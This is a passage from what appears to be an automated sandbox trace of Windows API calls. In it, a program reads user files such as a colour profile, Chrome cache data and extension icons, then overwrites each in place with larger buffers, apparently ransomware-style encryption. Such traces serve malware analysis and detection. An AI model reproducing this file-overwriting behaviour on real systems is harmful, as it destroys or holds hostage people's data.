lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.321] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.321] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.321] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.321] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.322] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.322] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.323] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.323] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.146] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.146] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.146] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.147] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.149] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.150] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.150] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.150] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.150] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.151] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.152] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.152] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.152] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.162] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.164] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.164] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.164] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.166] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.166] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.166] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.167] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.167] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.167] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0176.168] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0176.168] Sleep (dwMilliseconds=0x0) [0177.423] VirtualQuery (in: lpAddress=0x7db70000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7db70000, AllocationBase=0x7db70000, AllocationProtect=0x4, RegionSize=0x660000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.423] VirtualFree (lpAddress=0x7db70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.446] VirtualQuery (in: lpAddress=0x7e1d0000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7e1d0000, AllocationBase=0x7e1d0000, AllocationProtect=0x4, RegionSize=0x1a0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.447] VirtualFree (lpAddress=0x7e1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.447] VirtualQuery (in: lpAddress=0x7e370000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7e370000, AllocationBase=0x7e370000, AllocationProtect=0x4, RegionSize=0x200000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.447] VirtualFree (lpAddress=0x7e370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.447] CloseHandle (hObject=0x1cc) returned 1 [0177.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.449] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa74 [0177.449] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.449] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.449] ReleaseMutex (hMutex=0x168) returned 1 [0177.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsRGB.icc", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsRGB.icc", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wsRGB.icc", lpUsedDefaultChar=0x0) returned 9 [0177.449] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xa74, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f2bc*=0xa74, lpOverlapped=0x0) returned 1 [0177.453] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.454] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xffc, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xffc, lpOverlapped=0x0) returned 1 [0177.454] CloseHandle (hObject=0x1cc) returned 1 [0177.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.454] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.454] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4858 [0177.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.455] ReleaseMutex (hMutex=0x168) returned 1 [0177.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0177.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", cchWideChar=66, lpMultiByteStr=0x1fac7bc, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpUsedDefaultChar=0x0) returned 66 [0177.455] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3858 [0177.455] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.456] CloseHandle (hObject=0x1cc) returned 1 [0177.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.456] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.456] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2000 [0177.456] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.456] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.457] ReleaseMutex (hMutex=0x168) returned 1 [0177.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_2", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0177.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_2", cchWideChar=6, lpMultiByteStr=0x1f7ad5c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="data_2", lpUsedDefaultChar=0x0) returned 6 [0177.457] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0177.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.471] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0177.472] CloseHandle (hObject=0x1cc) returned 1 [0177.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.472] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.472] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x29 [0177.472] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.472] ReleaseMutex (hMutex=0x168) returned 1 [0177.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x1f733cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST-000001", lpUsedDefaultChar=0x0) returned 15 [0177.473] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fa54d8, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa54d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x29, lpOverlapped=0x0) returned 1 [0177.474] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.474] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0177.474] CloseHandle (hObject=0x1cc) returned 1 [0177.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.475] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.475] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa0 [0177.475] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.475] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.475] ReleaseMutex (hMutex=0x168) returned 1 [0177.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_16.png", lpUsedDefaultChar=0x0) returned 11 [0177.475] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e96998, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e96998*, lpNumberOfBytesRead=0x2e9f2bc*=0xa0, lpOverlapped=0x0) returned 1 [0177.476] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.476] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x628, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: 